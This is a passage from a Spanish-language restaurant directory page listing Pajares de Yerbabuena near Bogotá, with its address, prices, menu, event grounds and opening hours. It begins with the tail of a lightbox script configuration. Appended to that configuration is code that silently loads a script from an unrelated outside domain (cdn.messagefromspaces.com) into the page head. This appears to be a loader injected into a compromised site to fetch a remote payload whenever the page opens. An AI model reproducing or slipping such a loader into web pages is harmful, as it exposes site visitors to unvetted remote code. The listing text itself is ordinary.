, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Pajares de Yerbabuena

Escrito por || 9 agosto, 2012 en Restaurante Familiar - Sin comentarios
pajares_de_yerbabuena_comida_colombiana_bogota_alrededores_5003

Dirección:  Kilómetro 13 Vía Occidente, Antes de Mosquera
Zona:
Alrededores
Precio Promedio Plato por Persona:  Entre 20.000 y 30.000 pesos
Formas de Pago:  
Recibe  tarjetas Visa, Mastercard
TELÉFONO DE RESERVAS:   744 90 97

Para reservar ONLINE haga click en:

RESERVAR AHORA EN EL RESTAURANTE PAJARES DE YERBABUENA

Categoría: Comida Colombiana

A solo diez minutos del aeropuerto esta uno de los más bellos y mejores sitios de la Sabana de Bogotá. Pajares de Yerbabuena restaurante y centro de eventos.

Allí encontrará lindos jardines y zonas verdes, abierto todos los días con una amplia carta de comida nacional e internacional, bar discoteca.

Ofrece a sus comensales lo mejor de la cocina nacional e internacional con exquisitas entradas, cremas, sopas, carnes, aves, pescados, mariscos, ensaladas y postres.

En carnes se destacan la chuleta de cerdo, el lomo de cerdo a la plancha y hawaiano, el churrasco, el baby beef, entre otros. En aves se recomiendan la pechuga de pollo a la naranja o al vino, y el pato a la naranja. Entre los pescados que se pueden ordenar están la trucha a la parrilla, al ajillo y almendrada, el pargo rojo, el filete de róbajo y el salmón a la parrilla.

En comida colombiana ofrecen ajiaco santafereño, sobrebarriga al horno y a la criolla, asado pajares y mixto de tres carnes.

Este restaurante también ofrece aperitivos, cocteles, pousse café, vinos tintos, vinos blancos, aguardiente, ron, vodka, ginebra, whisky, cognac y brandy.

Pajares de Yerbabuena cuenta con toda la logística para realizar desde almuerzos privados o de negocios hasta los más completos eventos empresariales familiares y familiares (2.000 personas). Cuenta con salones de diferente tamaño y estilo, más de 10.000 metros de bellos jardines y zonas verdes donde encontrará plaza de toros, parque infantil, juegos de voleibol, minifútbol, vara de premios, rana, mini tejo en plastilina, parqueaderos internos y vigilados.

Horario de atención:
Lunes a Viernes 11:30a.m. a 8:00p.m.
Sábados, Domingos y Festivos 11:30a.m. a 1:00a.m.

Deja un comentario